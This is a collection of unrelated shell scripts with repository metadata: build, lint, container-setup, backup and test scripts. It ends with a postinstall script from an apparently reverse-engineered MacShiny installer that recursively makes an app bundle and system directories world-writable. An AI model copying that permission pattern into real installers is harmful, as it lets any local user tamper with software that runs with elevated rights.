echo PROJECT_PATH: $PROJECT_PATH
echo TARGET_NAME: $TARGET_NAME
echo KEYCENTER_PATH: $KEYCENTER_PATH
echo APP_PATH: $APP_PATH
# Patch the KeyCenter file (second argument 0 -- presumably "inject";
# the call below with 1 restores it. Confirm against modify_ios_keycenter.py.)
python3 /tmp/jenkins/api-examples/.github/ci/build/modify_ios_keycenter.py $KEYCENTER_PATH 0
if [ $? -eq 0 ]; then
echo "修改Keycenter文件 success"
else
echo "修改Keycenter文件 failed"
exit 1
fi
# Xcode clean
xcodebuild clean -workspace "${APP_PATH}" -configuration "${CONFIGURATION}" -scheme "${TARGET_NAME}"
# Timestamp
CURRENT_TIME=$(date "+%Y-%m-%d %H-%M-%S")
# Archive path
ARCHIVE_PATH="${WORKSPACE}/${TARGET_NAME}_${BUILD_NUMBER}.xcarchive"
# Build environment
# Export-options plist path
PLIST_PATH="${PROJECT_PATH}/ExportOptions.plist"
echo PLIST_PATH: $PLIST_PATH
# Archive: the workspace is used here; a project would also work.
xcodebuild archive -workspace "${APP_PATH}" -scheme "${TARGET_NAME}" -configuration "${CONFIGURATION}" -archivePath "${ARCHIVE_PATH}"
cd ${WORKSPACE}
# Zip the archive
7za a -slp "${TARGET_NAME}_${BUILD_NUMBER}.xcarchive.zip" "${ARCHIVE_PATH}"
# Sign
sh sign "${WORKSPACE}/${TARGET_NAME}_${BUILD_NUMBER}.xcarchive.zip" --type xcarchive --plist "${PLIST_PATH}" --application macApp
# Upload the package
python3 artifactory_utils.py --action=upload_file --file="${TARGET_NAME}_${BUILD_NUMBER}.app.zip" --project
# Delete the archive artifacts
rm -rf ${TARGET_NAME}_${BUILD_NUMBER}.xcarchive
rm -rf *.zip
# Restore the KeyCenter file
python3 /tmp/jenkins/api-examples/.github/ci/build/modify_ios_keycenter.py $KEYCENTER_PATH 1
| true |
cd64b8563fae29aa4006bb4cdcdc368812a34fcf | Shell | PalakPartani/UserRegistrationProblem | /UserRegistration.sh | UTF-8 | 1,068 | 3.703125 | 4 | [] | no_license | #!/bin/bash -x
echo "Welcome to user registration problem "
userNamePattern="[A-Z]{1}[A-Za-z]{2,}"
emailIdPattern="^[A-Za-z]*([.|+|-|_]?[A-Za-z]+)?[@]{1}[A-Za-z]{2,}[.]{1}[A-Za-z]{2,}([.]?[A-Za-z]{2,})?$"
checkNumber="^[1-9]{2}\s?[1-9]{1}[0-9]{9}$"
checkPassword="^[A-Za-z]{8}"
checkPassword="^[A-Z]{1,}[A-Za-z]{8,}$"
#function for atleast one numeric value
# Password strength check: at least one uppercase letter, at least one
# digit, and minimum length 8. Prints "Valid" or "Invalid" on stdout.
function checkAtleastOneDigit() {
	# The original test '[[ $1 =~ [[:upper:]] && [[:digit:]] && ... ]]'
	# evaluated the bare word "[[:digit:]]" as a non-empty string (always
	# true), so the digit requirement was never enforced. Match it against
	# $1 explicitly.
	if [[ $1 =~ [[:upper:]] && $1 =~ [[:digit:]] && ${#1} -ge 8 ]]
	then
		echo "Valid"
	else
		echo "Invalid"
	fi
}
#function to check validation
# Match $1 against the extended regular expression in $2 and report the
# result on stdout: "Valid !" on a match, "Invalid!" otherwise.
checkUserDetails(){
	local value=$1
	local pattern=$2
	if [[ $value =~ $pattern ]]
	then
		printf '%s\n' "Valid !"
	else
		printf '%s\n' "Invalid!"
	fi
}
echo "Enter Username:"
read firstName
checkUserDetails $firstName $userNamePattern
read lastName
checkUserDetails $lastName $userNamePattern
echo "Enter Emailid :"
read emailId
checkUserDetails $emailId $emailIdPattern
echo "Enter mobile no preceeding country code "
read number
checkUserDetails $number $checkNumber
echo "enter Password :"
read password
checkUserDetails $password $checkPassword
checkAtleastOneDigit $password
| true |
2044cbe5e84eca78ace802ea679fcb6b4e0bc9f6 | Shell | tnakaicode/jburkardt | /fd1d_advection_ftcs/fd1d_advection_ftcs.sh | UTF-8 | 376 | 2.734375 | 3 | [] | no_license | #!/bin/bash
#
# Compile; abort with a non-zero status when compilation fails.
g++ -c fd1d_advection_ftcs.cpp
if [ $? -ne 0 ]; then
  echo "Errors compiling fd1d_advection_ftcs.cpp"
  # was a bare 'exit', which returned the (successful) status of the echo
  exit 1
fi
#
# Link against the math library.
g++ fd1d_advection_ftcs.o -lm
if [ $? -ne 0 ]; then
  echo "Errors linking fd1d_advection_ftcs.o"
  exit 1
fi
#
# Install the executable and clean up the object file.
rm fd1d_advection_ftcs.o
mv a.out ~/bincpp/$ARCH/fd1d_advection_ftcs
#
echo "Executable installed as ~/bincpp/$ARCH/fd1d_advection_ftcs"
| true |
8de070a0cce9c6c23a33bacf64279b8ad0143b3f | Shell | digoal/bottledwater-pg | /build/bottledwater-docker-wrapper.sh | UTF-8 | 620 | 2.671875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/sh
# Build the Postgres connection string from the Docker link environment
# variables injected for the linked "postgres" container.
POSTGRES_CONNECTION_STRING="hostaddr=$POSTGRES_PORT_5432_TCP_ADDR port=$POSTGRES_PORT_5432_TCP_PORT dbname=postgres user=postgres"
KAFKA_BROKER="$KAFKA_PORT_9092_TCP_ADDR:$KAFKA_PORT_9092_TCP_PORT"
# Only pass --schema-registry when a schema-registry container is linked.
if [ -n "$SCHEMA_REGISTRY_PORT_8081_TCP_ADDR" ]; then
  SCHEMA_REGISTRY_URL="http://${SCHEMA_REGISTRY_PORT_8081_TCP_ADDR}:${SCHEMA_REGISTRY_PORT_8081_TCP_PORT}"
  schema_registry_opts="--schema-registry=$SCHEMA_REGISTRY_URL"
else
  schema_registry_opts=
fi
# exec replaces this wrapper so bottledwater receives container signals
# directly. $schema_registry_opts is deliberately left unquoted: when empty
# it must expand to no argument at all.
exec /usr/local/bin/bottledwater \
     --postgres="$POSTGRES_CONNECTION_STRING" \
     --broker="$KAFKA_BROKER" \
     $schema_registry_opts \
     "$@"
| true |
9f04fe6c26ac73181982d63019bff9d018419b8f | Shell | LRelar/cwr_last | /run.sh | UTF-8 | 440 | 3.328125 | 3 | [] | no_license | rm -rf corFiles/*/*.cor
rm -rf corFiles/*/*.log
rm -rf result
date="$(date)"
# Quote the -name pattern so the shell cannot glob-expand '*.s' in the
# current directory before find sees it, and quote "$date"/"$i"/"$f":
# $date contains spaces, which made the unquoted redirection targets
# 'run$date.log' ambiguous redirects in bash.
for i in $(find champs -maxdepth 1 -name '*.s');
do
	./asm "$i" >> "corFiles/our/run$date.log"
	f="$(basename -s .s "$i")"
	echo "$f"
	chmod 777 "champs/$f.cor"
	mv champs/*.cor corFiles/our
	./asm-school "$i" >> "corFiles/school/run$date.log"
	chmod 777 "champs/$f.cor"
	mv champs/*.cor corFiles/school
	# record differences between the two assemblers' outputs
	diff "corFiles/our/$f.cor" "corFiles/school/$f.cor" >> result
done
| true |
488f0d940895f6e758bac3e87f9f5e4e5a91493e | Shell | hashbang/shell-etc | /network/if-down.d/upstart | UTF-8 | 332 | 2.9375 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | #!/bin/sh -e
# Source the LSB helpers (provides init_is_upstart) when available.
if [ -e /lib/lsb/init-functions ]; then
    . /lib/lsb/init-functions
fi
# Nothing to do on systems that were not booted with upstart.
if ! init_is_upstart; then
    exit 0
fi
# Let's ignore meta entries (ifdown -a)
if [ "$ADDRFAM" = "meta" ]; then
    exit 0
fi
# Tell upstart that the interface went down; IFACE/LOGICAL/ADDRFAM/METHOD
# are provided in the environment of ifdown hook scripts.
initctl emit -n net-device-down \
    "IFACE=$IFACE" \
    "LOGICAL=$LOGICAL" \
    "ADDRFAM=$ADDRFAM" \
    "METHOD=$METHOD"
| true |
9f8e78be4a9000680dd262fd215e3c1205dd597b | Shell | shuangyichen/tmp | /fedml_experiments/distributed/fedavg/run_fedavg_pytorch.sh | UTF-8 | 684 | 2.53125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Positional CLI arguments for the FedAvg launcher.
CLIENT_NUM=$1
WORKER_NUM=$2
MODEL=$3
DISTRIBUTION=$4
ROUND=$5
EPOCH=$6
BATCH_SIZE=$7
LR=$8
DATASET=$9
DATA_DIR=${10}
CLIENT_OPTIMIZER=${11}
CI=${12}
# One MPI rank per client plus one extra rank (presumably the aggregator --
# confirm in main_fedavg.py). Shell arithmetic replaces the external,
# error-prone backtick `expr` invocation.
PROCESS_NUM=$((CLIENT_NUM + 1))
echo $PROCESS_NUM
#hostname > mpi_host_file
mpirun -np $PROCESS_NUM python3 ./main_fedavg.py \
  --model $MODEL \
  --dataset $DATASET \
  --data_dir $DATA_DIR \
  --partition_method $DISTRIBUTION \
  --client_num_in_total $CLIENT_NUM \
  --client_num_per_round $WORKER_NUM \
  --comm_round $ROUND \
  --epochs $EPOCH \
  --client_optimizer $CLIENT_OPTIMIZER \
  --batch_size $BATCH_SIZE \
  --lr $LR \
  --ci $CI
| true |
6c795a2ca32df519710522df206e4f6645dde8ff | Shell | badboy/whatrustisit | /build.sh | UTF-8 | 1,125 | 3.875 | 4 | [] | no_license | #!/bin/bash
# Prefer GNU sed where it is installed as gsed (e.g. macOS via Homebrew);
# the substitutions below use GNU extensions such as \+. Redirect stdout
# too: 'command -v' prints the resolved path, which the original version
# let leak into the script's output.
if command -v gsed >/dev/null 2>&1; then
  SED=gsed
else
  SED=sed
fi
# Ensure the stable toolchain is installed, then print its bare version
# number (e.g. "1.64.0"). rustup's own chatter goes to stderr.
stable() {
    rustup toolchain add stable >&2
    rustup run stable rustc --version | egrep -o '1\.[0-9]+\.[0-9]+'
}

# Print the beta version: the "1.x.y" plus any non-space suffix that
# follows the leading "rustc " prefix (e.g. "1.65.0-beta.2").
beta() {
    rustup toolchain add beta >&2
    rustup run beta rustc --version | \
        $SED 's/.\+\(1\.[0-9]\+\.[0-9]\+[^ ]*\).*/\1/'
}

# Print the nightly version as "1.x.y (YYYY-MM-DD)", rewriting rustc's
# "1.x.y-nightly (<commit-hash> <date>)" form.
nightly() {
    rustup toolchain add nightly >&2
    rustup run nightly rustc --version | \
        $SED 's/.\+\(1\.[0-9]\+\.[0-9]\+\)-nightly ([0-9a-f]\+ \(.\+\))/\1 (\2)/'
}
# Extract the parenthesised date from a "1.x.y (YYYY-MM-DD)" version string.
pickdate() {
    printf '%s\n' "$1" | $SED 's/\(1\.[0-9]\+\.[0-9]\+\) (\(.\+\))/\2/'
}
# Refresh all installed toolchains before querying versions.
rustup update
s=$(stable)
b=$(beta)
n=$(nightly)
nightlyDate=$(pickdate "$n")
# Fill the version placeholders in the HTML template.
$SED \
    -e "s/{STABLE}/$s/" \
    -e "s/{BETA}/$b/" \
    -e "s/{NIGHTLY}/$n/" \
    index.html.tmpl > index.html
# Emit rust-toolchain files; the unquoted here-docs expand $s etc.
cat <<EOS > stable
[toolchain]
channel = "$s"
EOS
# We can't pick the beta version without knowing the _exact_ release date,
# which is not even exposed anywhere.
# Maybe we can eventually parse https://static.rust-lang.org/manifests.txt
cat <<EOS > beta
[toolchain]
channel = "beta"
EOS
cat <<EOS > nightly
[toolchain]
channel = "nightly-${nightlyDate}"
EOS
| true |
e5984bc2aef5d9f56eb1581a59d92be016654f2f | Shell | panoptesDev/Panoptes_master | /scripts/build-downstream-projects.sh | UTF-8 | 2,722 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
#
# Builds known downstream projects against local panoptes source
#
set -e
# Run from the repository root regardless of invocation directory.
cd "$(dirname "$0")"/..
source ci/_
source scripts/read-cargo-variable.sh
# Local SDK version plus absolute paths to the cargo wrapper scripts.
panoptes_ver=$(readCargoVariable version sdk/Cargo.toml)
panoptes_dir=$PWD
cargo="$panoptes_dir"/cargo
cargo_build_bpf="$panoptes_dir"/cargo-build-bpf
cargo_test_bpf="$panoptes_dir"/cargo-test-bpf
# All downstream checkouts live under target/downstream-projects.
mkdir -p target/downstream-projects
cd target/downstream-projects
# Rewrite every Cargo.toml under $1 so the panoptes crate dependencies pin
# the locally built version in $panoptes_ver. Both the plain and the
# `{ version = "..." }` dependency forms are handled.
update_panoptes_dependencies() {
  local -a tomls=()
  mapfile -t tomls < <(find "$1" -name Cargo.toml)
  sed -i -e "s#\(panoptes-program = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
  sed -i -e "s#\(panoptes-program-test = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
  sed -i -e "s#\(panoptes-sdk = \"\).*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
  sed -i -e "s#\(panoptes-sdk = { version = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
  sed -i -e "s#\(panoptes-client = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
  sed -i -e "s#\(panoptes-client = { version = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
}
# Append a [patch.crates-io] section to the manifest named by $1, pointing
# the panoptes crates at the local checkout in $panoptes_dir.
patch_crates_io() {
  {
    echo "[patch.crates-io]"
    echo "panoptes-client = { path = \"$panoptes_dir/client\" }"
    echo "panoptes-program = { path = \"$panoptes_dir/sdk/program\" }"
    echo "panoptes-program-test = { path = \"$panoptes_dir/program-test\" }"
    echo "panoptes-sdk = { path = \"$panoptes_dir/sdk\" }"
  } >> "$1"
}
# Clone and build the helloworld example against the local panoptes SDK.
# Runs in a subshell so the cd does not leak.
example_helloworld() {
  (
    set -x
    rm -rf example-helloworld
    git clone https://github.com/panoptes-labs/example-helloworld.git
    cd example-helloworld

    update_panoptes_dependencies src/program-rust
    patch_crates_io src/program-rust/Cargo.toml
    # Close off the workspace so the program builds standalone.
    echo "[workspace]" >> src/program-rust/Cargo.toml

    $cargo_build_bpf \
      --manifest-path src/program-rust/Cargo.toml

    # TODO: Build src/program-c/...
  )
}
# Clone and build/test the panoptes program library against local crates;
# it ships its own patch script. Runs in a subshell so the cd does not leak.
spl() {
  (
    set -x
    rm -rf spl
    git clone https://github.com/panoptes-labs/panoptes-program-library.git spl
    cd spl

    ./patch.crates-io.sh "$panoptes_dir"

    $cargo build
    $cargo test
    $cargo_test_bpf
  )
}
# Clone and build/test serum-dex against the local panoptes crates.
# Runs in a subshell so the cd does not leak.
serum_dex() {
  (
    set -x
    rm -rf serum-dex
    git clone https://github.com/project-serum/serum-dex.git
    cd serum-dex

    update_panoptes_dependencies .
    patch_crates_io Cargo.toml
    patch_crates_io dex/Cargo.toml
    # Exclude the crank binary from the dex workspace.
    cat >> dex/Cargo.toml <<EOF
[workspace]
exclude = [
    "crank",
]
EOF

    $cargo build

    $cargo_build_bpf \
      --manifest-path dex/Cargo.toml --no-default-features --features program
    $cargo test \
      --manifest-path dex/Cargo.toml --no-default-features --features program
  )
}
# Run each downstream build through the `_` helper sourced from ci/_
# (presumably logs the command before executing it -- confirm in ci/_).
_ example_helloworld
#_ spl
_ serum_dex
| true |
55a952a111271fefc9fbfed3cd018f271cb67564 | Shell | arenadata/gpdb | /src/bin/pg_rewind/sql/pg_xlog_symlink.sql | UTF-8 | 1,895 | 3.40625 | 3 | [
"LicenseRef-scancode-rsa-md4",
"OLDAP-2.8",
"HPND-sell-variant",
"BSD-4-Clause-UC",
"Zlib",
"LicenseRef-scancode-zeusbench",
"LicenseRef-scancode-openssl",
"bzip2-1.0.6",
"LicenseRef-scancode-ssleay-windows",
"Beerware",
"LicenseRef-scancode-mit-modification-obligations",
"LicenseRef-scancode-sun-bcl-sdk-5.0",
"BSD-3-Clause",
"W3C-19980720",
"PostgreSQL",
"LicenseRef-scancode-rsa-1990",
"LicenseRef-scancode-other-copyleft",
"metamail",
"X11-distribute-modifications-variant",
"Spencer-94",
"NTP",
"W3C",
"ISC",
"RSA-MD",
"LicenseRef-scancode-pcre",
"LicenseRef-scancode-stream-benchmark",
"Apache-2.0",
"BSD-2-Clause",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"curl",
"OpenSSL",
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | #!/bin/bash
# This file has the .sql extension, but it is actually launched as a shell
# script. This contortion is necessary because pg_regress normally uses
# psql to run the input scripts, and requires them to have the .sql
# extension, but we use a custom launcher script that runs the scripts using
# a shell instead.

TESTNAME=pg_xlog_symlink

# Provides $TESTROOT, $TEST_MASTER, $MASTER_PSQL, $STANDBY_PSQL etc.
. sql/config_test.sh

# Change location of pg_xlog and symlink to new location
function before_master
{
	TEST_XLOG=$TESTROOT/$TESTNAME/pg_xlog
	rm -rf $TEST_XLOG
	mkdir $TEST_XLOG
	cp -r $TEST_MASTER/pg_xlog/* $TEST_XLOG/
	rm -rf $TEST_MASTER/pg_xlog
	ln -s $TEST_XLOG $TEST_MASTER/pg_xlog
}

# Do an insert in master.
function before_standby
{
	PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL <<EOF
CREATE TABLE tbl1 (d text);
INSERT INTO tbl1 VALUES ('in master');
CHECKPOINT;
EOF
}

function standby_following_master
{
	# Insert additional data on master that will be replicated to standby
	PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "INSERT INTO tbl1 values ('in master, before promotion');"
	# Launch checkpoint after standby has been started
	PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "CHECKPOINT;"
}

# This script runs after the standby has been promoted. Old Master is still
# running.
function after_promotion
{
	# Insert a row in the old master. This causes the master and standby to have
	# "diverged", it's no longer possible to just apply the standy's logs over
	# master directory - you need to rewind.
	PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "INSERT INTO tbl1 VALUES ('in master, after promotion');"
	# Also insert a new row in the standby, which won't be present in the old
	# master.
	PGOPTIONS=${PGOPTIONS_UTILITY} $STANDBY_PSQL -c "INSERT INTO tbl1 VALUES ('in standby, after promotion');"
}

# Print tbl1's contents so the test output shows the post-rewind state.
function after_rewind
{
	PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "SELECT * from tbl1"
}

# Run the test
. sql/run_test.sh
| true |
8e7a9f407cb224fcd01ed159bf33c5a020721063 | Shell | janxb/ServerUtils | /lxd-create | UTF-8 | 1,485 | 3.859375 | 4 | [
"Unlicense"
] | permissive | #!/bin/bash
set -e
# Abort unless exactly two arguments were given: IMAGE_NAME CONTAINER_NAME.
if [ "$#" -ne 2 ]; then
	echo "Illegal number of parameters."
	echo "Usage: lxd-create IMAGE_NAME CONTAINER_NAME"
	echo "Example: lxd-create ubuntu:lts c1"
	echo "Example: lxd-create images:debian/bullseye c1"
	exit 1
fi

# $1 = image, $2 = new container name.
lxc launch $1 $2

echo "Updating package lists"
lxc exec $2 -- apt-get update &>/dev/null

TOOLS="wget nano git htop iotop iftop net-tools unattended-upgrades"
echo "Installing additional packages ($TOOLS)"
lxc exec $2 -- apt-get install $TOOLS -y &>/dev/null

SU_PATH="/usr/local/sbin"
echo "Fetching ServerUtils into $SU_PATH"
lxc exec $2 -- git clone https://github.com/janxb/ServerUtils.git $SU_PATH &>/dev/null

echo "Upgrading packages"
lxc exec $2 -- do-package-upgrades -y &>/dev/null

echo "Configuring unattended upgrades"
# random-string is a sibling ServerUtils helper -- presumably returns a
# unique token for the temp file name (TODO confirm).
TMP_FILENAME="/tmp/"$(random-string)
printf '
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "1";
APT::Periodic::Unattended-Upgrade "1";
APT::Periodic::AutocleanInterval "14";
APT::Periodic::Verbose "0";
' > $TMP_FILENAME
lxc file push $TMP_FILENAME "$2/etc/apt/apt.conf.d/10periodic" &>/dev/null
# Remove the stock auto-upgrades file; ignore failure if it is absent.
lxc file delete "$2/etc/apt/apt.conf.d/20auto-upgrades" &>/dev/null || true
rm $TMP_FILENAME

TMP_FILENAME="/tmp/"$(random-string)
printf '
Unattended-Upgrade::Origins-Pattern {
	"origin=*";
};
' > $TMP_FILENAME
lxc file push $TMP_FILENAME "$2/etc/apt/apt.conf.d/50unattended-upgrades" &>/dev/null
rm $TMP_FILENAME

echo Container created: $2
| true |
41247264cce26f8307e3df9b06198e8c393a1e5b | Shell | noah/dotzsh | /09_xorg | UTF-8 | 670 | 2.84375 | 3 | [] | no_license | # poor man's display manager
#
# On tty1 with no X session running, start X directly (poor man's display
# manager); exec replaces this shell with the session.
if [[ -z "$DISPLAY" ]] && [[ $(tty) = /dev/tty1 ]]; then
  # ~/.xinitrc decides which wm to use
  exec startx > ~/logs/startx.log 2>&1
else
  # don't start keychain if logging in from tty
  # [[ -f ~/.ssh/id_dsa ]] && /usr/bin/keychain --timeout 999999 --quiet --nogui ~/.ssh/id_dsa
  [[ -f ~/.ssh/id_rsa ]] && /usr/bin/keychain --timeout 999999 --quiet --nogui ~/.ssh/id_rsa
  # [[ -f ~/.ssh/id_ed25519 ]] && /usr/bin/keychain --quiet --nogui ~/.ssh/id_ed25519
  # Import the agent environment that keychain cached for this host.
  [[ -f ~/.keychain/$HOST-sh ]] && . ~/.keychain/$HOST-sh
  # [[ -f ~/.keychain/$HOST-sh-gpg ]] && . ~/.keychain/$HOST-sh-gpg
fi
# vim: ft=zsh
| true |
d1f55f328c5d4152503f58fddfb0e24d20e1d8e0 | Shell | aristidetraian/debiansetup | /vidscript.sh | UTF-8 | 210 | 3.125 | 3 | [] | no_license | #!/bin/bash
#FILES=/path/to/*
# Copy vid.v1.py into every immediate subdirectory and run it there.
# Iterate the glob directly instead of parsing `ls -d */` output, and quote
# "$f" so directory names containing spaces survive.
for f in */
do
	# skip the literal '*/' that an unmatched glob leaves behind
	[ -d "$f" ] || continue
	echo "Processing $f file..."
	cp vid.v1.py "$f"
	# guard the cd: without it a failed cd would make 'cd ..' walk upward
	cd "$f" || continue
	python vid.v1.py
	cd ..
	# take action on each file. $f store current file name
done
| true |
d129b326d5c09ecd33c88a191b8bdc7ff87fc9a1 | Shell | tridactyl/tridactyl | /scripts/common.sh | UTF-8 | 1,863 | 4.0625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Accepts no arguments
# Returns git-add'ed files as a list of filenames separated by a newline character
# (staged .ts/.tsx sources, excluding declaration files and tests)
cachedTSLintFiles() {
    git diff --cached --name-only --diff-filter=ACM "*.ts" "*.tsx" ":(exclude)*.d.ts" ":(exclude)tests/*" ":(exclude)*test.ts" ":(exclude)e2e_tests/*"
}

# Accepts no arguments
# Returns git-add'ed files as a list of filenames separated by a newline character
# (staged markdown and css files)
cachedPrettierFiles() {
    git diff --cached --name-only --diff-filter=ACM "*.md" "*.css"
}
# Accepts a single argument which is the name of a file tracked by git
# Returns a string which is the content of the file as stored in the git index
staged() {
    local path=$1
    git show ":${path}"
}
# Accepts a single string argument made of multiple file names separated by a newline
# Returns an array of files that prettier wants to lint
# (i.e. staged files whose prettier-formatted output differs from the staged
# content; printed newline-separated on stdout)
prettierUgly() {
    local acc=""
    # split $1 on newlines only, so names with spaces stay intact
    local IFS=$'\n'
    for jsfile in $1; do
        diff <(staged "$jsfile") <(staged "$jsfile" | "$(yarn bin)/prettier" --stdin-filepath "$jsfile") >/dev/null || acc="$jsfile"$'\n'"$acc"
    done
    echo "$acc"
}
# Accepts the staged file names as individual arguments.
# Prints (newline-separated) the subset whose *staged* content fails eslint;
# the staged copies are materialised under .tmp so unstaged worktree edits
# are ignored.
eslintUgly() {
    local acc=""
    local IFS=$'\n'
    local tmpdir
    mkdir -p ".tmp"
    # macOS ships BSD mktemp without --tmpdir; gmktemp is GNU coreutils.
    if [[ "$(uname)" == "Darwin" ]]; then
        tmpdir=$(gmktemp --tmpdir=".tmp/" -d "tslint.XXXXXXXXX")
    else
        tmpdir=$(mktemp --tmpdir=".tmp/" -d "tslint.XXXXXXXXX")
    fi
    for jsfile in "$@"; do
        tmpfile="$tmpdir/$jsfile"
        mkdir -p "$(dirname "$tmpfile")"
        staged "$jsfile" > "$tmpfile"
        "$(yarn bin)/eslint" --no-ignore --quiet -o /dev/null "$tmpfile" || acc="$jsfile"$'\n'"$acc"
    done
    rm -rf "$tmpdir"
    echo "$acc"
}
# Accepts the staged file names as individual arguments.
# Prints (space-separated) the files whose staged diff adds a line that
# contains console.log.
noisy() {
    local acc=()
    local jsfile
    for jsfile in "$@"; do
        # count added '+' lines containing console.log in the cached diff
        if [ "$(git diff --cached "$jsfile" | grep '^+.*console.log' -c)" -gt '0' ] ; then
            # was acc+=("jsfile") -- appended the literal word "jsfile"
            # instead of the matching file name
            acc+=("$jsfile")
        fi
    done
    echo "${acc[@]}"
}
| true |
4aeae808dce1f02525a72d92256c389a1e4cba60 | Shell | marqusm/bash-scripts | /utils/sync.sh | UTF-8 | 1,027 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
# Constants and default values
# The <...> placeholders are meant to be filled in per deployment.
ROOT_NAME="<ROOT_FOLDER>"
WORKING_FOLDER_NAME="<WORKING_FOLDER_NAME>"
FILE_PREFIX="<FILE_PREFIX>"
FILE_EXTENSION=".dat"
SERVER_PATH="<SERVER_PATH>"
PASSWORD="<PASSWORD>"
BANDWIDTH_LIMIT="<BANDWIDTH_LIMIT>"
CIPHER_ALGORITHM="AES256"
# Parameters
# Optional first argument overrides the rsync bandwidth limit.
if [ -n "$1" ]
then
    BANDWIDTH_LIMIT=$1
fi
FOLDER=${ROOT_NAME}"/"${WORKING_FOLDER_NAME}
# Timestamped archive name, e.g. PREFIX-1700000000.dat
FILE_NAME=${FILE_PREFIX}"-`date +%s`"
FINAL_NAME=${FILE_NAME}""${FILE_EXTENSION}
echo "$(date) $FILE_NAME Start"
echo "$(date) $FILE_NAME Archive"
cd ${FOLDER}
# NOTE(review): the gpg passphrase is passed on the command line and is
# visible in `ps` output while the archive is created -- confirm acceptable.
tar -cv * | gpg -c --cipher-algo ${CIPHER_ALGORITHM} --verbose --passphrase ${PASSWORD} -o ${ROOT_NAME}"/"${FINAL_NAME}
# zip -0 -P ${PASSWORD} -r $FILE_NAME *
# rar a -s -ep1 -m0 -hp${PASSWORD} $FILE_NAME *
cd ${ROOT_NAME}
echo "$(date) $FILE_NAME Upload"
rsync -Pha --bwlimit=${BANDWIDTH_LIMIT} ${FINAL_NAME} ${SERVER_PATH}
echo "$(date) $FILE_NAME Removing Sync folder content and file"
# Clear the working folder and drop the local encrypted archive.
rm -rf ${FOLDER}/* ${FINAL_NAME}
echo "$(date) $FILE_NAME Finished"
| true |
16e10271dc397673726913f0028099cd4f9d9e2a | Shell | paulpierre/MacShiny-Reversed | /Double click to install.pkg_/MacShinyFull-SOURCE/InstallGS/InstallGS.pkg/postinstall | UTF-8 | 7,718 | 2.71875 | 3 | [] | no_license | #!/bin/sh
# postinstall.sh
echo "Presets\scripts\gsScripts\postinstall"
echo "PID: $$; PPID: $PPID; Args: $(ps -o args= $$)"
if [ -f "/tmp/.cyanDebug/_enableInstallScriptTrace" ]; then
set -x
fi
########################### Sending Last Logs >>
#sendLastLogsScriptPath="/Library/Application Support/CyanSoft/gsservice/.SendLastLogs.sh"
#if [ -f "$sendLastLogsScriptPath" ]; then
# chmod 555 "$sendLastLogsScriptPath"
# echo "Launch last logs sending task"
# #launch last logs sennding task. It will be executed event if installer is killed
# nohup sh "$sendLastLogsScriptPath" &
#fi
############################################# <<
USER=`ls -la /dev/console | cut -d " " -f 4`
echo "user:$USER"
echo "SUDO_USER:$SUDO_USER"
USER_NOT_ROOT=`ls -la /dev/console | fgrep -v "root" | cut -d " " -f 4`
echo "USER_NOT_ROOT:$USER"
USER_LOGIN_WIN=$(ps auxwww | fgrep -v "fgrep /System" | fgrep /System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow | awk '{print $1}')
echo "USER_LOGIN_WIN:$USER_LOGIN_WIN"
echo "ls console:"
ls -la /dev/console
echo "stat:"
stat -f "%Su" /dev/console
echo "chown+chmod -R $USER:staff /Library/Application Support/CyanSoft/gsservice/GSService.app"
chown -R "$USER":staff "/Library/Application Support/CyanSoft/gsservice/GSService.app"
chmod -R 777 "/Library/Application Support/CyanSoft/gsservice/GSService.app"
echo "mkdir+chmod /Library/Application Support/CyanSoft/gsservice/clients"
mkdir "/Library/Application Support/CyanSoft/gsservice/clients"
chmod 777 "/Library/Application Support/CyanSoft/gsservice/clients"
chmod 777 "/Library/Application Support/CyanSoft/"
echo "mkdir /Library/Logs"
mkdir "/Library/Logs"
echo "mkdir+chmod /Library/Logs/CyanSoft"
mkdir "/Library/Logs/CyanSoft"
chmod 777 "/Library/Logs/CyanSoft"
echo "mkdir: /Users/$USER"
mkdir "/Users/$USER"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER"
chmod 777 "/Users/$USER"
fi
echo "mkdir: /Users/$USER/Library"
mkdir "/Users/$USER/Library"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library"
chmod 777 "/Users/$USER/Library"
fi
echo "mkdir: /Users/$USER/Library/Logs"
mkdir "/Users/$USER/Library/Logs"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library/Logs"
chmod 777 "/Users/$USER/Library/Logs"
fi
echo "mkdir+chmod: /Users/$USER/Library/Logs/CyanSoft"
mkdir "/Users/$USER/Library/Logs/CyanSoft"
chmod 777 "/Users/$USER/Library/Logs/CyanSoft"
echo "mkdir: /Users/$USER/.mono"
mkdir "/Users/$USER/.mono"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/.mono"
chmod 777 "/Users/$USER/.mono"
fi
echo "mkdir: /Users/$USER/.mono"
mkdir "/Users/$USER/.mono"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/.mono"
chmod 777 "/Users/$USER/.mono"
fi
